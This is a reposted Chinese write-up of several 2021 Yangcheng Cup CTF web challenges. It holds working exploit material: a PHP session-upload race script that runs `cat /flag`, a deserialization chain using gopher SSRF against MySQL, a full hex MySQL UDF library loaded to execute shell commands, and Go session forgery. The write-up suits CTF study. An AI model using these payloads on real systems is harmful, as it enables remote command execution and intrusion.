安全-2021羊城杯WP(部分)

Posted 小狐狸FM

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全-2021羊城杯WP(部分)相关的知识,希望对你有一定的参考价值。

文章目录

前言

此文章来自EDI安全公众号文章,并非原创,如有侵权可联系删除

原文章

Web

web1 only 4


def start_flag(s):
global stop_threads
while True:
if stop_threads:
break
f = io.BytesIO(b'a' * 1024 * 50)
url = 'http://192.168.41.134:8000/?
gwht=/var/lib/php5/sess_1&ycb=http://127.0.0.1'
headers = {'Cookie': 'PHPSESSID=1', }
data = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat
/flag');echo 'flag';?>"} # Payload
files = {"file": ('1.txt', f)}
rest = s.post(url, headers=headers, data=data, files=files)
if 'flag' in r.text:
print(rest.text)
exit()
if __name__ == '__main__':
with requests.session() as session:
while thread_num:
thre = threading.Thread(target=run, args=(s,))
thre.start()
thread_list.append(thre)
for t in thread_list:
t.join()

EasyCurl

扫描得到文件 下载后发现sql

sql里有密码


访问admin.php 发送数据


<?php
class User{
function __construct()
{
$this->username = "admin";
}
}
$a = new User();
echo serialize($a);
# O:4:"User":1:{s:8:"username";s:5:"admin";}

可以看到返回了admin


根据备份 挖掘链子

<?php
class file_request{
public function __construct()
{
// SELECT concat(schema_name) from information_schema.schemata
//gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%
6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6
f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d
%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%
65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%3
8%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%43%00
%00%00%03%53%45%4c%45%43%54%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%73%63%
68%65%6d%61%5f%6e%61%6d%65%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6
f%6e%5f%73%63%68%65%6d%61%2e%73%63%68%65%6d%61%74%61%3b%01%00%00%00%01
// O:4:"User":1:{s:8:"username";O:12:"cache_parser":3:
{s:4:"user";O:4:"User":2:
{s:8:"username";s:3:"asd";s:10:"session_id";s:3:"asd";}s:6:"logger";r:2;s:15
:"default_handler";O:12:"file_request":1:
{s:3:"url";s:820:"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00
%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%
72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%7
2%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d
%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%
69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%6
6%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d
%79%73%71%6c%59%00%00%00%03%53%45%4c%45%43%54%20%67%72%6f%75%70%5f%63%6f%6e%
63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%20%66%72%6f%6d%20%69%6e%66%6f%7
2%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72
%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%27%63%74%66%27%3b%01%00%00%00%
01";}}}
// $this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%3e%0
0%00%00%03%63%72%65%61%74%65%20%66%75%6e%63%74%69%6f%6e%20%73%79%73%5f%65%76
%61%6c%20%72%65%74%75%72%6e%73%20%73%74%72%69%6e%67%20%73%6f%6e%61%6d%65%20%
27%6d%79%73%71%6c%75%64%66%2e%73%6f%27%3b%01%00%00%00%01"
// $this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%23%0
0%00%00%03%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%22%6c%73%20%2d%6c
%20%2f%3b%63%61%74%20%2f%2a%22%29%3b%01%00%00%00%01";
// $this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1c%0
0%00%00%03%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%22%6c%73%20%2d%6c
%20%2f%22%29%3b%01%00%00%00%01"
$this->url =
"gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%0
0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00
%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%
6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6
d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76
%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%
38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1e%0
0%00%00%03%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%22%2f%72%65%61%64
%66%6c%61%67%22%29%3b%01%00%00%00%01";
}
}
class cache_parser{
function __construct(){
$this->user = new User(1);
$this->user->username = "asd";
$this->user->session_id = "asd";
$this->logger = &$this;
$this->default_handler = new file_request();
// $this->default_handler = "phpinfo"; // execute
}
}
class User{
function __construct($a)
{
if ($a==1){
}else{
$this->username = new cache_parser();
}
}
}
$exp = new User(2);
echo serialize($exp);


mysql是空 密码 ssrf打一下


读取数据库无果


试了一下mysql扩展


catmysqludf.txt
show variables like '%plugin%';
select
unhex('7F454C4602010100000000000000000003003E0001000000800A00000000000040000
0000000000058180000000000000000000040003800060040001C00190001000000050000000
00000000000000000000000000000000000000000000000C414000000000000C414000000000
00000002000000000000100000006000000C814000000000000C814200000000000C81420000
00000004802000000000000580200000000000000002000000000000200000006000000F8140
00000000000F814200000000000F814200000000000800100000000000080010000000000000
8000000000000000400000004000000900100000000000090010000000000009001000000000
00024000000000000002400000000000000040000000000000050E5746404000000441200000
0000000441200000000000044120000000000008400000000000000840000000000000004000
0000000000051E57464060000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000800000000000000040000001400000003000000474E5
500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000
700000080080248811944C91CA44003980468831100000013000000140000001600000017000
000190000001C0000001E000000000000001F000000000000002000000021000000220000002
30000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868B
E12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3
B9FD4A0AD73D1C50B5911FEAB5FBE12000000000000000000000000000000000000000000000
0000000000000000000030009008809000000000000000000000000000001000000200000000
0000000000000000000000000000000250000002000000000000000000000000000000000000
000CD00000012000000000000000000000000000000000000001E01000012000000000000000
00000000000000000000000620100001200000000000000000000000000000000000000E3000
0001200000000000000000000000000000000000000B90000001200000000000000000000000
0000000000000006801000012000000000000000000000000000000000000001600000022000
0000000000000000000000000000000000054000000120000000000000000000000000000000
0000000F00000001200000000000000000000000000000000000000B20000001200000000000
0000000000000000000000000005A01000012000000000000000000000000000000000000005
201000012000000000000000000000000000000000000004C010000120000000000000000000
0000000000000000000E800000012000B00D10D000000000000D100000000000000330100001
2000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000
000000000007800000012000B009F0B0000000000004C00000000000000FF000000120009008
8090000000000000000000000000000800100001000F1FF10172000000000000000000000000
0001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000
000000000000000000000009B00000012000B00480C0000000000000A0000000000000025010
00012000B00420F0000000000006700000000000000AA00000012000B00520C0000000000006
3000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000
B00EB0B0000000000005D00000000000000790100001000F1FF1017200000000000000000000
00000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C0
00000000000F100000000000000F700000012000B00A20E00000000000067000000000000003
900000012000B004C0B0000000000004900000000000000D400000012000B00A60D000000000
0002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676
D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F526
5676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696
E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E697
4006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E697400737
9735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E0073797
35F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007
379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6
465696E6974007379735F657865630073797374656D007379735F6576616C5F696E697400737
9735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007
374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005
F5F6273735F7374617274005F656E6400474C4942435F322E322E35000000000000000000000
2000200020002000200020002000200020002000200020002000100010001000100010001000
1000100010001000100010001000100010001000100010001000100010001006F01000010000
00000000000751A6909000002009101000000000000F0142000000000000800000000000000F
0142000000000007816200000000000060000000200000000000000000000008016200000000
000060000000300000000000000000000008816200000000000060000000A000000000000000
0000000A81620000000000007000000040000000000000000000000B01620000000000007000
000050000000000000000000000B81620000000000007000000060000000000000000000000C
01620000000000007000000070000000000000000000000C8162000000000000700000008000
0000000000000000000D01620000000000007000000090000000000000000000000D81620000
0000000070000000A0000000000000000000000E016200000000000070000000B00000000000
00000000000E816200000000000070000000C0000000000000000000000F0162000000000000
70000000D0000000000000000000000F816200000000000070000000E0000000000000000000
0000017200000000000070000000F00000000000000000000000817200000000000070000001
000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F
20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C200068010
00000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFF
FFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C2
0006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C2000680800000
0E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFF
F259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B0
5ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415
453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2
000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0
C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F840000000
00048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00
F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C074214
88D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB
645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE
04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B4
5E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F
08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0
D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897
DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B4
5E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488
B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF
8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889C
E4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040
000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B4008488
3C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D040
24883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488
D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C
9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E
811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B401
0488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B1
0488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B004
80345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488
B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4
DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE84
88975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C
1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4
889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488
975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54
883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E04
88B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8B
A2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E5488
1EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8F
BFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D
0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFF
F4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80
CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C
64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F
9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8F
BFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B8
5C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909
090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08F
FD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F2
0617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7
379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696
F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207
479706520706172616D6574657200000000000045787065637465642065786163746C7920747
76F20617267756D656E74730000457870656374656420737472696E67207479706520666F722
06E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6
F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFD
C000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBF
FFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000F
EFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A520001781
0011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C0
70800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C000
0005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A
3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A000
00000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108
602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602E
C0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001
C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C010
0009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0
A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410
E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0
602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C0708000
0001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C070800000000000
0000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF000000000000000000000
00000000000F01420000000000001000000000000006F010000000000000C000000000000008
8090000000000000D000000000000004811000000000000F5FEFF6F00000000B801000000000
0000500000000000000E805000000000000060000000000000070020000000000000A0000000
00000009D010000000000000B000000000000001800000000000000030000000000000090162
0000000000002000000000000003801000000000000140000000000000007000000000000001
70000000000000050080000000000000700000000000000F0070000000000000800000000000
000600000000000000009000000000000001800000000000000FEFFFF6F00000000D00700000
0000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFF
F6F0000000001000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000F81420000000000000000000000000000000000000000000B609000000000000C6090
00000000000D609000000000000E609000000000000F609000000000000060A0000000000001
60A000000000000260A000000000000360A000000000000460A000000000000560A000000000
000660A000000000000760A0000000000004743433A2028474E552920342E342E37203230313
23033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342
E3720323031323033313320285265642048617420342E342E372D31372900002E73796D74616
2002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D69640
02E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6
E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E6
96E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F6864720
02E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656
C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D6
56E7400000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000001B000000070000000
2000000000000009001000000000000900100000000000024000000000000000000000000000
000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B80100000
0000000B801000000000000B4000000000000000300000000000000080000000000000000000
00000000000380000000B0000000200000000000000700200000000000070020000000000007
8030000000000000400000002000000080000000000000018000000000000004000000003000
0000200000000000000E805000000000000E8050000000000009D01000000000000000000000
00000000100000000000000000000000000000048000000FFFFFF6F020000000000000086070
0000000000086070000000000004A00000000000000030000000000000002000000000000000
20000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000
0002000000000000000040000000100000008000000000000000000000000000000640000000
40000000200000000000000F007000000000000F007000000000000600000000000000003000
00000000000080000000000000018000000000000006E0000000400000002000000000000005
00800000000000050080000000000003801000000000000030000000A0000000800000000000
0001800000000000000780000000100000006000000000000008809000000000000880900000
0000000180000000000000000000000000000000400000000000000000000000000000073000
000010000000600000000000000A009000000000000A009000000000000E0000000000000000
000000000000000040000000000000010000000000000007E000000010000000600000000000
000800A000000000000800A000000000000C8060000000000000000000000000000100000000
0000000000000000000000084000000010000000600000000000000481100000000000048110
000000000000E000000000000000000000000000000040000000000000000000000000000008
A00000001000000020000000000000058110000000000005811000000000000EC00000000000
0000000000000000000080000000000000000000000000000009200000001000000020000000
0000000441200000000000044120000000000008400000000000000000000000000000004000
000000000000000000000000000A0000000010000000200000000000000C812000000000000C
812000000000000FC01000000000000000000000000000008000000000000000000000000000
000AA000000010000000300000000000000C814200000000000C814000000000000100000000
0000000000000000000000008000000000000000000000000000000B10000000100000003000
00000000000D814200000000000D814000000000000100000000000000000000000000000000
8000000000000000000000000000000B8000000010000000300000000000000E814200000000
000E814000000000000080000000000000000000000000000000800000000000000000000000
0000000BD000000010000000300000000000000F014200000000000F01400000000000008000
00000000000000000000000000008000000000000000000000000000000CA000000060000000
300000000000000F814200000000000F81400000000000080010000000000000400000000000
00008000000000000001000000000000000D3000000010000000300000000000000781620000
0000000781600000000000018000000000000000000000000000000080000000000000008000
00000000000D8000000010000000300000000000000901620000000000090160000000000008
000000000000000000000000000000008000000000000000800000000000000E100000008000
0000300000000000000101720000000000010170000000000001000000000000000000000000
000000008000000000000000000000000000000E600000001000000300000000000000000000
0000000000010170000000000005900000000000000000000000000000001000000000000000
1000000000000001100000003000000000000000000000000000000000000006917000000000
000EF00000000000000000000000000000001000000000000000000000000000000010000000
200000000000000000000000000000000000000581F00000000000068070000000000001B000
0002C00000008000000000000001800000000000000090000000300000000000000000000000
000000000000000C026000000000000420300000000000000000000000000000100000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
3000100900100000000000000000000000000000000000003000200B80100000000000000000
000000000000000000003000300700200000000000000000000000000000000000003000400E
8050000000000000000000000000000000000000300050086070000000000000000000000000
0000000000003000600D00700000000000000000000000000000000000003000700F00700000
0000000000000000000000000000000030008005008000000000000000000000000000000000
00003000900880900000000000000000000000000000000000003000A00A0090000000000000
0000000000000000000000003000B00800A00000000000000000000000000000000000003000
C00481100000000000000000000000000000000000003000D005811000000000000000000000
00000000000000003000E00441200000000000000000000000000000000000003000F00C8120
0000000000000000000000000000000000003001000C81420000000000000000000000000000
000000003001100D81420000000000000000000000000000000000003001200E814200000000
00000000000000000000000000003001300F0142000000000000000000000000000000000000
3001400F81420000000000000000000000000000000000003001500781620000000000000000
0000000000000000000030016009016200000000000000000000000000000000000030017001
0172000000000000000000000000000000000000300180000000000000000000000000000000
0000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000
000000000000000000000001C00000001001000C81420000000000000000000000000002A000
00001001100D81420000000000000000000000000003800000001001200E8142000000000000
0000000000000004500000002000B00A00A00000000000000000000000000005B00000001001
700101720000000000001000000000000006A000000010017001817200000000000080000000
00000007800000002000B00200B0000000000000000000000000000110000000400F1FF00000
0000000000000000000000000008400000001001000D01420000000000000000000000000009
100000001000F00C01400000000000000000000000000009F00000001001200E814200000000
0000000000000000000AB00000002000B0010110000000000000000000000000000C10000000
400F1FF00000000000000000000000000000000D40000000100F1FF901620000000000000000
00000000000EA00000001001300F0142000000000000000000000000000F700000001001100E
0142000000000000000000000000000040100000100F1FFF8142000000000000000000000000
0000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F00000
00000002F000000000000001E01000020000000000000000000000000000000000000002D010
00020000000000000000000000000000000000000004101000012000C0048110000000000000
0000000000000004701000012000B00A90F0000000000000A000000000000005701000012000
000000000000000000000000000000000006B010000120000000000000000000000000000000
00000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0
000000000005501000000000000960100001200000000000000000000000000000000000000A
901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000
000F100000000000000D30100001200000000000000000000000000000000000000E50100001
200000000000000000000000000000000000000F901000012000000000000000000000000000
000000000000D02000012000B004C0B000000000000490000000000000028020000220000000
00000000000000000000000000000004402000012000B00A60D0000000000002B00000000000
0005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C00000
00000000A000000000000006F020000120000000000000000000000000000000000000083020
00012000B00420F0000000000006700000000000000910200001200000000000000000000000
000000000000000A50200001200000000000000000000000000000000000000B902000012000
B00520C0000000000006300000000000000C10200001000F1FF1017200000000000000000000
0000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172
000000000000000000000000000E80200001200000000000000000000000000000000000000F
D02000012000B00090F0000000000000A000000000000000D030000120000000000000000000
0000000000000000000220300001000F1FF10172000000000000000000000000000290300001
2000000000000000000000000000000000000003C03000012000900880900000000000000000
000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544
F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5
F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746
F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5
F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F637
46F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F464
65345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005
F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745
F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6
465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C494
2435F322E322E35007379735F657865635F696E6974007379735F6576616C006667657473404
0474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696
E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726
C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C6
9625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697
A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745
F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322
E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676
574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F73746172740
06C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474
C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4
942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696
E697400') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
create function sys_eval returns string soname 'mysqludf.so';
select sys_eval("/readflag");

写出mysql扩展


创建函数

create function sys_eval returns string soname 'mysqludf.so';


列目录 发现readflag


/readflag获取flag

Checkin_Go


关键点在这里 /game


通过知道可以购买flag 但是不够钱 发现设置了一个o的cookies

看着像base64 解码看看 去掉数字和那个杠继续


chekNowMoney这个值我们从代码里可以看到是cookies一定有的 并且这个值就是加密后20w的值 之后猜测可能是sessions伪造 但这个是随机生成的 查了相关资料发现 go里面的math/seed 如果没设定 默认为1 默认种子为1这就代表着我们随机数可控,那我们伪造sessions就行了 伪造一个钱

以上是关于安全-2021羊城杯WP(部分)的主要内容,如果未能解决你的问题,请参考以下文章

[WP]2021羊城杯-Web部分

[羊城杯2021] wp

2021年“羊城杯”网络安全大赛部分Writeup

2021羊城杯(部分web)

2021羊城杯(部分web)

2021陇剑杯网络安全大赛wp-webshell部分(详细题解)